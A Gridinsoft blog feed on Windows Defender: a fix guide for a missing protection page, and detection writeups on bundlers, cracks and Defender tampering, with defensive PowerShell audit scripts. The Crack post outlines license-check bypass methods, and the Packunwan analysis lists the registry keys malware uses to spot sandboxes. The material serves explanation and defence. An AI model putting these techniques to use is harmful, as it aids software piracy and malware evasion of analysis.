Windows Defender Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/windows-defender/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Wed, 03 Apr 2024 17:58:40 +0000

Virus and Threat Protection Page Not Available
https://gridinsoft.com/blogs/virus-and-threat-protection-page-not-available/
Wed, 03 Apr 2024 11:22:18 +0000

Windows 10 and 11 users may sometimes encounter a “Virus and threat protection page not available” message. Although this message doesn’t necessarily mean that your computer is infected, the absence of this critical security feature is not a good sign. It leaves your PC vulnerable to potential attacks.

There are several reasons for this, and we will explore them further below. It is worth clarifying that such a message is normal on a corporate device, where an administrator can hide the page; on a personal computer, though, it is not. Today, I’ve gathered the most effective ways to fix this issue.

“Virus and Threat Protection Page Not Available” – What Does It Mean?

The message “Virus and Threat Protection Page Not Available” indicates trouble accessing Windows Security features: for some reason, the application cannot display the interface the user requested. The virus and threat protection page gives a comprehensive overview of your device’s security status. It shows the antivirus software you are using, your device’s firewall status, and the other security features that are enabled.

The “Virus and Threat Protection Page Not Available” message (screenshot)

Windows Security is the built-in security app developed by Microsoft, with Microsoft Defender Antivirus as its antivirus engine. Initially, it was designed to protect against simple threats like viruses and other malware. Now, however, it is an all-in-one tool with more complex defenses against phishing and other cyber attacks. It includes Virus and threat protection, Account protection, Firewall and network protection, App and browser control, Device security, Device performance and health, and Family options. This doesn’t always work out properly, though, and now I will tell you why.

Why Is The Virus And Threat Protection Page Not Available?

Usually, to access Windows Security, you click on the Windows Security icon from the taskbar, or open the menu from the settings. If everything works correctly, you can access the menu with no problems. However, if Windows Security is unavailable, an error message will appear saying “Page not available”. Here are a few reasons for this to happen.

Note: here we are not considering the case of a corporate device where Device Security is disabled by the administrator or by Group Policy settings. The following section covers personal devices only.

Specific OS edition

Windows Enterprise or LTSC editions can have security features disabled by default. You can see the edition of your Windows copy by going to Settings → System → About, and checking the Windows specifications.

Windows 10 LTSC has its antivirus settings disabled by default (screenshot)

Normally, it is possible to change the security settings back to normal. I will show how to do this later in this post.

Improper OS settings after the reset

After resetting your OS, the virus and threat protection settings may not be configured correctly. The reasons for this are particularly hard to trace, and tracing them is in fact a waste of time: in this case, the issue can be solved in just a few clicks.

Windows ISO obtained from unofficial sources

Obtaining a Windows image from questionable or pirated sources can result in essential security features being missing or disabled. The authors of such builds often try to make them as lightweight as possible by removing “unnecessary” features, and the antivirus is often the first to go.

Incompatibility with third-party antivirus

Sometimes, third-party antivirus tools are not compatible with Windows Security. This happens when two or more antimalware apps try to control or modify the same system resources simultaneously, which can lead to conflicts, malfunctions, or even one of them being disabled completely.

Malware activity

Malware compromising system security settings could cause the “virus and threat protection page not available” notification. It can cause severe damage to your system, including data loss and theft. Since most average users only use the built-in Windows protection, any malware will obviously try to neutralize it first.

How to Fix the Virus and Threat Protection Page Not Available Error?

Although the Virus and Threat Protection Page Not Available error has quite a few possible causes, it is rather easy to fix. All the troubleshooting boils down to understanding why it happened – I’ve named the reasons above. Now, let’s switch to the actual fixes.

1. Uninstall third-party security software

Today, most third-party antivirus solutions work well when paired with Microsoft Defender. However, some applications still require disabling the built-in Microsoft Defender to work correctly. If you have a third-party antivirus installed, try uninstalling it.

2. Update Your Windows

Cybersecurity threats evolve constantly, and malicious actors exploit software vulnerabilities to gain unauthorized access or cause harm to your system. Windows updates often include patches for known security vulnerabilities; they can also resolve existing problems in the security components and keep your computer running optimally.

Open Settings from the Start menu, select Update & Security, and click Check for updates under Windows Update.

Check for updates (Windows Update page screenshot)

This may take a while, especially if you’ve been ignoring system updates for some time. Nonetheless, it is worth waiting, as the chances of this solving the issue are high.

3. Repair and Restart Windows Security

Although Windows is a fairly stable operating system, uninstalling third-party software can sometimes corrupt Windows Defender files. In that case, you can try resetting the Windows Security app, which may get it running again (Windows 11 only).

First, click on the search icon or box on your taskbar. Then, search for “Windows Security.”

Start screenshot

Here, select the Windows Security App and click the “App settings” option on the right panel.

Click on the “Terminate” button. After that, restart your computer to check if the error message is resolved.

Security terminate

If the issue persists, follow the same steps to access the Windows Security settings interface. Then, click on the “Reset” button to reset Windows Security.

reset security

Restart your computer again to ensure all the changes are applied successfully.

These were the relatively simple fixes, and they should have helped. However, if the Virus and Threat Protection page is still unavailable, move on to the more involved solutions I’ve gathered below.

4. Run SFC and DISM

SFC and DISM are command-line tools that detect and repair system file corruption in Windows. If Virus and threat protection is missing on Windows 10/11 because of a system bug or a corrupted image, use either tool to fix it. To repair your computer, follow these instructions:

Click on the Start menu and search for “Command Prompt”.

Start and command prompt

Right-click on “Command Prompt” and select “Run as administrator”.

To repair your system files using SFC, enter or paste the following into the Command Prompt window and press Enter: sfc /scannow

cmd sfc

To repair the system image using DISM, enter or paste the following into the Command Prompt window and press Enter: DISM.exe /Online /Cleanup-Image /RestoreHealth

cmd Restorehealth

5. Disable UI Lockdown

Sometimes the cause of the Virus and Threat Protection Page Not Available issue is a disabled Windows Defender interface, the result of the so-called UI Lockdown being turned on. To fix this, run PowerShell as administrator and execute Set-MpPreference -UILockdown 0. This re-enables the interface and resolves the issue.

Set-MpPreference -UILockdown 0 command

6. Change the registry keys through Regedit

If the issue persists, you can add a few values manually using Regedit. To begin, press Win+R, type “regedit” in the Run dialog box, and press Enter.

Run screenshot

Once you are in Regedit, navigate to HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender. Right-click the empty area and select New → DWORD (32-bit) value.

Create DWORD

Next, name the value DisableAntispyware. Similarly, create another value named DisableRealtimeMonitoring. Leave the default data of 0 for both values.

Close the Registry Editor and restart your system. After restarting, check if Microsoft Defender is available with its apps.

7. Using Local Group Policy

One more option is adjusting the Local Group Policy setting responsible for the Microsoft Defender interface. A changed policy may be the result of malware activity or of a third-party antivirus conflicting with Defender. Fixing it requires opening the Group Policy editor.

Press the Windows key + R to open the Run dialog box and type or paste this: gpedit.msc. Go to Computer Configuration → Administrative Templates → Windows Components.

Local Group Policy screenshot

Open the Windows Security folder and navigate to Virus and threat protection.

Hide the virus and threat protection area screenshot

Double-click the Hide the virus and threat protection area and select Not Configured.

Not Configured checkbox

Restart your PC to apply the new settings and try running the feature.
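As an added, read-only check for steps 1 and 5 to 7 (my example, not code from the original post or from GridinSoft), the PowerShell script below reads the state that those steps change, so you can see which step applies before editing anything. It uses Get-MpComputerStatus and Get-MpPreference from the Defender module, the root/SecurityCenter2 WMI namespace for registered third-party antivirus products, and the policy keys named above. Two assumptions: that the “Hide the virus and threat protection area” policy writes a UILockdown value under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection, and that DisableRealtimeMonitoring is documented in the Real-Time Protection subkey, so the script checks both that subkey and the parent key used in step 6. One caveat: Microsoft documents DisableAntiSpyware as a legacy value that current Windows 10/11 builds ignore, so step 6 may have no effect there; the audit still reports it.

```powershell
# Added example: read-only audit of the settings that steps 1 and 5-7 change.
# Not from the Gridinsoft post. Run in an elevated PowerShell; it reports and changes nothing.

function Get-RegistryDword {
    # Returns the DWORD stored at $Path\$Name, or $null when the key or value does not exist.
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Get-DefenderUiAudit {
    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    # Assumption: the "Hide the virus and threat protection area" policy writes UILockdown here.
    $vtpPolicy  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection'

    $status = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $pref   = Get-MpPreference     -ErrorAction SilentlyContinue
    # Third-party products register themselves with the Security Center; Defender is listed too, so filter it out.
    $thirdParty = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
        Where-Object { $_.displayName -notlike '*Defender*' } |
        Select-Object -ExpandProperty displayName

    [pscustomobject]@{
        Edition                   = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
        ThirdPartyAV              = @($thirdParty) -join ', '
        AMServiceEnabled          = [bool]$status.AMServiceEnabled
        RealTimeProtectionEnabled = [bool]$status.RealTimeProtectionEnabled
        TamperProtected           = [bool]$status.IsTamperProtected
        UILockdown                = [bool]$pref.UILockdown
        DisableAntiSpyware        = Get-RegistryDword $policyRoot 'DisableAntiSpyware'
        # Step 6 creates this value directly under the policy root; the documented location is the
        # Real-Time Protection subkey, so look in both places and keep the first one found.
        DisableRealtimeMonitoring = @(
            Get-RegistryDword $policyRoot 'DisableRealtimeMonitoring'
            Get-RegistryDword "$policyRoot\Real-Time Protection" 'DisableRealtimeMonitoring'
        ) | Where-Object { $null -ne $_ } | Select-Object -First 1
        HideVirusThreatArea       = Get-RegistryDword $vtpPolicy 'UILockdown'
    }
}

function Get-DefenderUiFindings {
    # Maps the audit results to the numbered steps of the post.
    param($Audit = (Get-DefenderUiAudit))
    $findings = @()
    if ($Audit.Edition -match 'LTSC|Enterprise') {
        $findings += "Edition '$($Audit.Edition)' may ship with security features off by default"
    }
    if ($Audit.ThirdPartyAV) {
        $findings += "Third-party antivirus registered: $($Audit.ThirdPartyAV) (step 1)"
    }
    if ($Audit.UILockdown) {
        $findings += 'UILockdown is on; run Set-MpPreference -UILockdown 0 (step 5)'
    }
    if ($Audit.DisableAntiSpyware -eq 1 -or $Audit.DisableRealtimeMonitoring -eq 1) {
        $findings += 'Defender disabled through the policy key (step 6)'
    }
    if ($Audit.HideVirusThreatArea -eq 1) {
        $findings += 'Virus and threat protection area hidden by policy (step 7)'
    }
    if (-not $Audit.AMServiceEnabled) {
        $findings += 'Defender antimalware service is not running; try steps 2 to 4'
    }
    if ($findings.Count -eq 0) { $findings += 'No policy override or lockdown found; try steps 2 to 4' }
    return $findings
}

$audit = Get-DefenderUiAudit
$audit | Format-List
Get-DefenderUiFindings -Audit $audit
```

Running it before and after a fix gives a quick way to confirm that the value you changed is the one that was actually set; a policy value that reappears after a reboot points at malware or management software re-applying it, which is the case the last section of the post covers.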

Install Compatible Anti-malware

As I said at the beginning, this could be the result of malware activity. Most malware targets the built-in Windows defenses first, which explains a lot. In such cases, I recommend using a third-party solution, but it is equally important that the third-party solution works well alongside the built-in one.

That’s why I recommend GridinSoft Anti-Malware. It works perfectly with Microsoft Defender and does not burden the system. After installation, run a full scan, which will completely clean the system.

PUADlmanager Win32/InstallCore
https://gridinsoft.com/blogs/puadlmanager-win32-installcore/
Wed, 03 Apr 2024 10:05:41 +0000

PUADlmanager Win32/InstallCore is a detection name that Microsoft Defender antivirus uses for potentially unwanted applications (PUA). It is malware that poses a serious threat to Windows users. Unlike simple unwanted programs, InstallCore combines the functions of a downloader and an installer, automatically distributing many unwanted applications and potentially dangerous programs to infected devices.

Win32/InstallCore may not look like a serious threat, but the effects of its activity are not pleasant either. Unwanted programs, adware, junk apps – this PUA is not picky about things it spreads. It is a serious threat to users that requires attention and removal.


What is PUADlmanager Win32/InstallCore?

PUADlmanager Win32/InstallCore is the detection name for a program that packages additional software with the main one. It is not a stand-alone program, but rather a layer on top of the program’s installer. Once you launch such an infused installer, InstallCore is up too, ready to perform its dirty deeds.

PUADlmanager Win32/InstallCore detection

The prefix “PUADlmanager” (PUA Downloading Manager) describes this behavior clearly. What InstallCore tries to accomplish is downloading and installing things in the background, without the user’s permission. This is how those who spread the program monetize their effort. Typically, the apps it installs are unwanted programs of some sort and adware.

Things like Win32/InstallCore are often spread embedded in pirated software. Some freeware may contain it too, particularly programs from platforms like Softonic, Download.com and FileHippo.

Is InstallCore a False Positive?

As far as I reckon, false positives of PUADlmanager Win32/InstallCore can occur in several cases. One of the users on the Information Security Stack Exchange forum noted that it can be related to security signature updates or to installing third-party software. This is not always a threat; it rather belongs to the “gray” category, as it is not as dangerous as malware.

Another example of a false positive was discussed on the JDownloader Community forum, where Microsoft Defender mistakenly detected malware in the JDownloader.exe file. In this case, the JDownloader developers reported the false positive and asked users to report it as well, confirming that JDownloader does not contain malware. There was also a discussion on the Microsoft forum about a false positive on the Five Nights at Freddy’s game installer.

User complaint about false positive results (screenshot)

Antivirus programs regularly update their malware signature databases. Sometimes, new signatures can mistakenly classify safe files or programs as malicious. However, users may not pay attention to additional programs that are offered for installation along with the main software. If such additional software falls into the PUA/PUP category, Microsoft Defender will detect it as such.

How does PUADlmanager Win32/InstallCore affect my computer?

As I wrote above, the danger of PUADlmanager is that it downloads and installs numerous unwanted programs without the user’s consent or knowledge. Most of them may have unpredictable consequences for the computer and user data. To test this, I’ve found several examples of apps that Microsoft Defender detected as Win32/InstallCore.

In one instance, the app had no real functionality, being just a shell with an attractive interface. It was advertised as software to help download files, particularly from torrents, but didn’t really provide any real features. This became clear when I discovered that despite promises of advanced features for an additional fee, the program actually provided no utility and could perform suspicious activities on my PC.

However, uselessness is not the only issue here. As soon as I pressed the “Install” button, numerous other programs started to appear. Driver updaters, “free” VPNs, system tuners – plenty of them. Their sheer volume made the virtual machine I was running the test on exceptionally slow.

Desktop after the InstallCore activity (screenshot)

One more thing that was definitely an effect of InstallCore activity is advertisements flooding the websites. It looks like, aside from the unwanted programs, this PUA also brought adware of some sort. Irrelevant advertisements kept popping up both in the browser and in the system tray until the malware was removed.

Advertisements on every page (screenshot)

On top of that, the browser started opening pages that demand installing questionable browser plugins. Among other things, I noticed a well-known plugin called Dragon Angel. It works as a browser hijacker and is usually promoted in exactly this way. Still, it may be the lesser evil here, as browser plugins can also work as infostealers and crypto hijackers.

Malicious ad distributing the Dragon Angel extension (screenshot)

Overall, PUADlmanager Win32/InstallCore is not a severe threat by any measure. But the effects of its activity are nowhere near pleasant either: they make the system hard to use, distract you with ads, and potentially open the computer up to further infections. It should be removed as soon as possible.

How to remove PUADlmanager Win32/InstallCore from PC?

To deal with PUADlmanager Win32/InstallCore, it is recommended to use reliable antivirus software capable of detecting and removing all malware components. GridinSoft Anti-Malware offers an effective solution for detecting and eliminating threats of this kind, providing comprehensive system protection.

Manual removal of InstallCore and the related unwanted programs is possible, but it requires some knowledge and can be time-consuming. To prevent infection, avoid downloading programs from unverified sources and do not open suspicious email attachments.

HackTool:Win32/Crack
https://gridinsoft.com/blogs/hacktool-win32-crack/
Sat, 30 Mar 2024 10:43:57 +0000

HackTool:Win32/Crack is related to hacking tools for bypassing license verification. These are often activators of Windows, MS Office, and other proprietary software. Contrary to the widespread belief that such tools are safe, they can carry a threat.

The most popular sources of such hacking tools are torrent distributions and websites with hacked software. Let me explain what hacked software is, what risks its use entails, and whether it pays off compared to licensed software.

What is HackTool:Win32/Crack

HackTool:Win32/Crack is a generic detection that Microsoft Defender assigns to a piece of code that bypasses a license check. It is worth clarifying that it rarely refers to a stand-alone program; more often it is a modified element of a benign app. Win32/Crack means a change to the program files, or a part of them, aimed at disabling the license verification mechanism.

HackTool:Win32/Crack detection popup (screenshot)

Win32/Crack is often distributed via torrents or websites dedicated to cracked software, i.e. software whose licensing system has been tweaked or disabled. It can be either a separate file or embedded into the executable of the target program. By its nature, HackTool:Win32/Crack does not pose a direct threat to the system, even though what it does is illegal. Defender detects such tools as a matter of course, as part of the fight against piracy.

Is Hacktool:Win32/Crack Dangerous?

Although Win32/Crack itself is not dangerous, many cracks come with other malware embedded in the same executable file. Particularly greedy authors of such software do this to monetize their effort. Such “bonuses” can include infostealers and more severe malware like ransomware. As a result, instead of saving money, the user pays a higher price in the form of stolen confidential data or encrypted files.

How does Win32/Crack Work?

There are two different types of software cracking: by making the program believe it has a proper activation and by disabling this check completely. Both have pros and cons, and both are illegal to perform and use. Let’s have a closer look at how this works.

The methods of software cracking below are listed exclusively for educational purposes. I discourage using unlicensed software, due to both legal dangers and malware hazards. These hacking approaches are here to make a clear understanding of what exactly Microsoft Defender means as Win32/Crack.

Disabling the license check

One way to protect software from unauthorized use is by including a check license function in its startup procedures. Essentially, the software program is a set of instructions, represented as a series of bytes, executed by the CPU. During reverse engineering, the checkLicense section is identified and decompiled. A programmer may patch the binary by replacing specific bytes to bypass the check license requirement.

Poking around code (screenshot)

The patched bytes typically satisfy the check license requirement by writing values into registers or memory addresses or returning a particular status code. After patching the binary, the handyman manipulates the check license function, and the software program is considered “cracked.” However, with most apps now checking keys on their servers, this method is becoming less common.

Embedding the key

This crack approach emulates the online key verification process and returns a positive result without a real internet connection. Often, one of the points in the instructions for using the app is “deny the application access to the Internet”. This is because the license will be deactivated once the app connects to the server and discovers that it is fake. These days, most cracks do not depend on the connection and allow you to enter any text instead of the key.

In the real world, things are more complicated now, as the software will “phone home” and see if those keys are any good. This can be bypassed by sniffing/decrypting HTTPS traffic and finding the Web request that asks if the key is valid. From there, it can be intercepted, thus never letting the request reach its final destination and replying with your own (fake) response.

A handyman can craft such a response or log and copy an already valid one. The program will believe it got the go-ahead from the server and continue operating as normal. Alternatively, the binary can be modified so that it always treats the server’s answer as positive. Another trick of this grade is to run a fake HTTP server that always replies positively and redirect the check to it.

Is it a False Positive?

In most cases, HackTool:Win32/Crack is not a false positive, with just a few exceptions. As I said at the beginning, it detects specific changes made to the program file. Microsoft Defender can mistakenly report HackTool:Win32/Crack if a program’s code contains changes that could be interpreted as signs of a crack. For instance, if a program uses strings, jumps or calls typical of Win32/Crack, the antivirus might incorrectly classify it as one. In such cases, I recommend checking the file with our free online checker.

Safety Recommendations

I’d emphasize once again: for your own safety, do not use pirated software at all. In addition to being illegal, pirated software is a breeding ground for malware. Once a user adds any malware or potentially unwanted software to the antivirus exceptions, it can take on a life of its own. Therefore, if you see a HackTool:Win32/Crack detection, download GridinSoft Anti-Malware and perform a full scan of your device.

PUA:Win32/Packunwan
https://gridinsoft.com/blogs/pua-win32-packunwan/
Thu, 28 Mar 2024 11:56:10 +0000

PUA:Win32/Packunwan is a generic detection of a potentially unwanted program that uses software packing. It can range from merely annoying to a severe threat to system safety, and the degree of damage to the system varies accordingly.

Usually, these unwanted programs are distributed as “recommended software” in freeware, shareware or cracked installers. The name “Packunwan” stands for the unwanted program that uses packing, which makes the analysis more complicated. Programs detected with this name are almost always some no-name tools or duplicates of other programs.


PUA:Win32/Packunwan Overview

PUA:Win32/Packunwan is a potentially unwanted application (PUA) detection. However, analysis of samples collected on the Web revealed much more malicious functionality. Due to the diverse nature of the reports, it is hard to ascertain their precise behavior without in-depth analysis. At the same time, this unwanted program was not attributed to any known developer or company, leading to speculation that these programs may be of dubious origin.

PUA:Win32/Packunwan detection (screenshot)

While PUAs are not necessarily viruses, they can still be disruptive and pose security risks. Packunwan typically displays unwanted advertisements on your computer. It can also track your browsing activity and change your browser settings. Among the most noticeable is the change to your homepage or search engine.

On the other hand, the behavior of this program goes far beyond “showing unwanted ads”. Reviewing the sample shows that it collects far too much system information, which in combination with packing and detection evasion makes it look fishy. The overall activity of Packunwan can lead to compromised privacy and malware injection.

Packunwan Technical Analysis

As I’ve just said, while analyzing Packunwan malware samples I saw a lot of questionable actions. In particular, it collects far too much information about the system: not enough to call it spyware, but still more than I would consider acceptable. Also, its networking is outright strange, bordering on what you would expect from dropper malware. Even though not all samples were like this, there was a consistent behavior pattern.

Launch & System Discovery

Upon execution, the reviewed Packunwan sample checks the computer’s location settings for no obvious reason. This is standard behavior for malware, but not for a “driver updater”. To do this, it queries the registry for specific values related to country code configuration.

Registry entries that Packunwan accesses to get location info (screenshot)

After that, the program starts gathering system information. Through a selection of registry queries and system function calls, it retrieves the list of installed software, OS information and system drivers. The latter is needed for the functionality of a “driver updater”, but it is also useful for discovering whether the system is a virtual machine.

One anti-analysis trick that I am sure about is checking the disk info through a registry query. The malware checks SCSI registry keys, which reveal whether the disk is a virtual one created by a sandbox environment or a virtual machine. SCSI technology is not supported these days, and it is unlikely that a geek playing with geriatric hardware would use questionable apps.

HKLM\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001
HKLM\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000

Persistence and Detection Evasion

PUA:Win32/Packunwan uses various obfuscation techniques to dodge detection. As its name implies, its files are packed, i.e. compressed and encrypted. The sample I reviewed encrypted data using the RC4 PRGA. Additionally, it attempts to conceal itself by creating files in user directories with extensions that do not match the file type. At the same time, it disguises the payload as part of the “driver updater” files.

For persistence, the program creates Windows services and adds entries to the Registry Run keys and startup folders. While a rather commonplace step, it remains effective, especially on poorly protected systems. Packunwan also does not let you opt out of autostart from its interface, a common practice among unwanted programs.
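As an added triage example from the defender’s side (my code, not from this post or from GridinSoft), the PowerShell script below looks for the tricks just described: Run-key and startup-folder entries, services whose binary lives under a user profile, and files under the user profile whose extension does not match their PE (“MZ”) header. It is read-only and only reports candidates for a closer look. The executable-extension list and the 50 MB size cap are my assumptions, not anything taken from the analysis.

```powershell
# Added triage example, not from the Gridinsoft post. Read-only: it lists, it does not delete.

function Get-AutorunEntries {
    # Run/RunOnce keys for the machine and the current user, plus both startup folders.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    $psNoise = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -in $psNoise) { continue }
            [pscustomobject]@{ Source = $key; Name = $p.Name; Command = $p.Value }
        }
    }
    foreach ($dir in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
        if (-not (Test-Path $dir)) { continue }
        Get-ChildItem -Path $dir -File | ForEach-Object {
            [pscustomobject]@{ Source = $dir; Name = $_.Name; Command = $_.FullName }
        }
    }
}

function Get-UserProfileServices {
    # A service binary under C:\Users is unusual for legitimate software and matches the
    # "service plus user-directory files" pattern described above.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -match '\\Users\\' } |
        Select-Object Name, State, StartMode, PathName
}

function Test-IsPeFile {
    # True when the file starts with the 'MZ' DOS header that every PE (exe/dll/sys) carries.
    param([string]$Path)
    try {
        $fs = [System.IO.File]::OpenRead($Path)
        try {
            $buf = New-Object byte[] 2
            $n = $fs.Read($buf, 0, 2)
            return ($n -eq 2 -and $buf[0] -eq 0x4D -and $buf[1] -eq 0x5A)
        } finally { $fs.Dispose() }
    } catch { return $false }
}

function Find-DisguisedExecutables {
    # PE files whose extension says they are something else (e.g. payload.dat, update.tmp).
    # Assumptions: this extension list and the size cap; adjust both for your environment.
    param([string]$Root = $env:USERPROFILE, [int]$MaxSizeMB = 50)
    $peExtensions = '.exe', '.dll', '.sys', '.scr', '.ocx', '.cpl', '.drv', '.efi', '.mui'
    Get-ChildItem -Path $Root -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -lt ($MaxSizeMB * 1MB) -and $_.Extension.ToLower() -notin $peExtensions } |
        Where-Object { Test-IsPeFile $_.FullName } |
        Select-Object FullName, Length, LastWriteTime
}

'--- Autorun entries ---'
Get-AutorunEntries | Format-Table -AutoSize
'--- Services running from a user profile ---'
Get-UserProfileServices | Format-Table -AutoSize
'--- PE files with a non-executable extension under the user profile ---'
Find-DisguisedExecutables | Format-Table -AutoSize
```

The recursive walk of the whole user profile can take a few minutes on a large profile; point Find-DisguisedExecutables at the directory the “driver updater” installed into to narrow it down. Anything it lists is a lead, not a verdict: check the file’s signature and hash before acting on it.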

Network Communications

I’ve mentioned that Packunwan is usually distinctive for its networking activity, though not every sample had as much strange background activity as the one I looked at more closely. Within a short period of time, it makes repeated requests to a remote server. You can see an example of one of these messages below:

One of the HTTP GET requests from the Packunwan sample (screenshot). Source: Tria.ge

Sure enough, driver updaters have to get the drivers they are about to install from somewhere. But as far as I’m aware, no legitimate program creates that much chaos in the networking logs. It is either poor software design or an attempt to conceal something by blending it into this mess.

How To Remove PUA:Win32/Packunwan

You will need an antimalware tool to remove PUA:Win32/Packunwan. I recommend GridinSoft Anti-Malware as the optimal solution in such a case. Run a full scan, whether it turns out to be an adware PUA or a dropper. It may take a little longer, but it guarantees a more thorough cleaning.

PUABundler:Win32/Rostpay
https://gridinsoft.com/blogs/puabundler-win32-rostpay/
Wed, 27 Mar 2024 15:56:37 +0000

PUABundler:Win32/Rostpay is an antivirus detection related to software released by Rostpay LLC. Antivirus programs detect it because it carries a lot of additional unwanted programs (PUA). Although the company’s own applications are not malicious, the software bundled with them can have unpredictable consequences.

As history shows, software developers like Rostpay have already made a name for themselves in the digital marketplace as builders of unwanted software. In pursuit of free software, users take risks that expose their systems and devices.


What is PUABundler:Win32/Rostpay?

PUABundler:Win32/Rostpay is the name of a potentially unwanted program detected by Microsoft Defender. This is complex software that is usually distributed bundled with other applications, often without the user’s explicit consent. Such bundles may include components such as adware, browser toolbars, pseudo-system optimizers, and so on.

[Image: Microsoft Defender detection of PUABundler:Win32/Rostpay]

As I wrote above, Rostpay developers bundle their free programs with unknown and almost always unrelated software. A lot of users complain online that numerous unwanted programs get installed alongside the programs developed by this company.

Others complain about the troubles these programs create. In other words, Rostpay’s software is not particularly effective and creates only a pale resemblance of real work. Its removal can also be complicated and require additional software. This is what makes such software count as an unwanted program.

PUABundler:Win32/Rostpay Analysis

Samples for analysis were not difficult to find: you just need to download programs from Rostpay. I opted for Tesla Browser and Driver Hub, downloaded and installed them.

Win32/Rostpay #1 – Driver Hub

Driver Hub is a program ostensibly designed to check for and update outdated drivers on your system. But there are pitfalls that spoil the overall picture. When we open the setup file, we see the following message:

[Image: PUA installation offer on the setup screen of Driver Hub]

As I’ve mentioned above, PUABundler:Win32/Rostpay usually comes with bundled software, and this checks out in my test with Driver Hub. The offered programs may differ from the Yahoo offer I saw, depending on the product you install and your location.

What did not happen to me, but is a frequent point of user complaints after Rostpay activity, is various system troubles. People particularly report Internet connectivity issues, keyboard input problems, and similar bugs. Most probably these are the outcome of installing a faulty driver; at least, the symptoms sound like driver issues.

[Image: DriverHub interface]

That is actually one major problem with any “driver updater” software: they rarely have the most recent, correctly working drivers for all hardware. All attempts to build such a thing fail for one reason: there is too much hardware out there. Driver Hub is no exception.

Win32/Rostpay #2 – Tesla Browser

Tesla Browser is another thing detected as PUABundler:Win32/Rostpay. According to its advertising, it is a web browser that offers an improved browsing experience. However, not everything is as rosy as it seems at first glance. The first questionable thing pops up during installation: an offer to install an unrelated program.

[Image: Tesla Browser installer with the offer to also install a shady password manager]

Tesla Browser itself can come in the very same kind of bundle, hidden as “recommended software”. Such unwanted programs spread quite literally by budding: one contains two others, and each of them in turn installs another two. So yes, one unwanted program can make a mess that is hard to ignore.

The biggest problem with Tesla Browser is that it can act as adware or a browser hijacker. Forget what they promise on the website: no “advanced security features” or “regular updates”. This browser can redirect your queries to a random search engine and display modified search results filled with promotions. And even when you do not use it, pop-ups offering to install plug-ins or other stuff keep appearing in other browsers.

Removing Win32/Rostpay and other PUAs from PC

I recommend GridinSoft Anti-Malware, which will easily remove all remnants of Win32/Rostpay and the garbage installed with it. In general, the program also provides decent real-time protection of your system.


Uninstalling Win32/Rostpay, as well as the other software installed together with it without your permission, is possible manually. However, there is a risk that you will not be able to clean up all the elements unwanted programs leave in the system, and their sheer volume can make manual removal a time-consuming endeavour. Quality antivirus software will facilitate this process and save you time.

VirTool:Win32/DefenderTamperingRestore
https://gridinsoft.com/blogs/virtoolwin32-defendertamperingrestore/
Mon, 25 Mar 2024 23:29:53 +0000

The post VirTool:Win32/DefenderTamperingRestore appeared first on Gridinsoft Blog.

VirTool:Win32/DefenderTamperingRestore is the name of a Microsoft Defender detection for a malicious element present in the system. Usually it marks something that weakens the system security and makes the device vulnerable to malware injection. Let’s find out how dangerous this is and how to deal with it.

Threats like VirTool are often a sign of an ongoing malware attack. The tampering code may be embedded in the malware itself or run as a stand-alone script. The fact that malicious software tries to disable antivirus tools usually means its activity is hard to conceal, i.e. it is something harsh and severe. Ransomware, desktop blockers, vandal viruses, coin miners: all of them can make use of a defenceless system.


What is VirTool:Win32/DefenderTamperingRestore?

VirTool:Win32/DefenderTamperingRestore detection points at a malignant element that can prevent Microsoft Defender from working properly. This includes various scripts, particularly ones that modify the registry values controlling the functioning of Defender. It is also triggered when you try to run scripts or download programs designed to subvert system defenses. Such tampering is hidden from the user and runs in the background, which makes malware detection and removal more difficult.

[Image: VirTool:Win32/DefenderTamperingRestore detection]

Pirated software can also contain code that modifies system settings to bypass license restrictions without carrying any malicious functionality. But pirated software may just as well include scripts that disable Microsoft Defender so that the malicious components bundled with it are not detected and removed.

Is VirTool:Win32/DefenderTamperingRestore false positive?

Although VirTool:Win32/DefenderTamperingRestore usually indicates malicious activity, in some cases it may be a false positive. This can happen if legitimate software or administrative scripts change security settings during normal operation or system maintenance. Before dismissing the alert, look at the detection details in Windows Security for the file or script that triggered it: an admin script you recognise is one thing, an unknown file under a temp folder is another.

[Image: Users complaining about false positives]

VirTool:Win32/DefenderTamperingRestore also sometimes appears in scenarios involving Microsoft Safety Scanner (MSERT), which can identify and report changed settings as part of its scan and revert them to safer configurations.

DefenderTamperingRestore Analysis

As I said above, it specializes in modifying registry values to disable Microsoft Defender or restrict its capabilities. This is mainly done through PowerShell or Command Prompt commands that modify system policies and specific Defender settings.

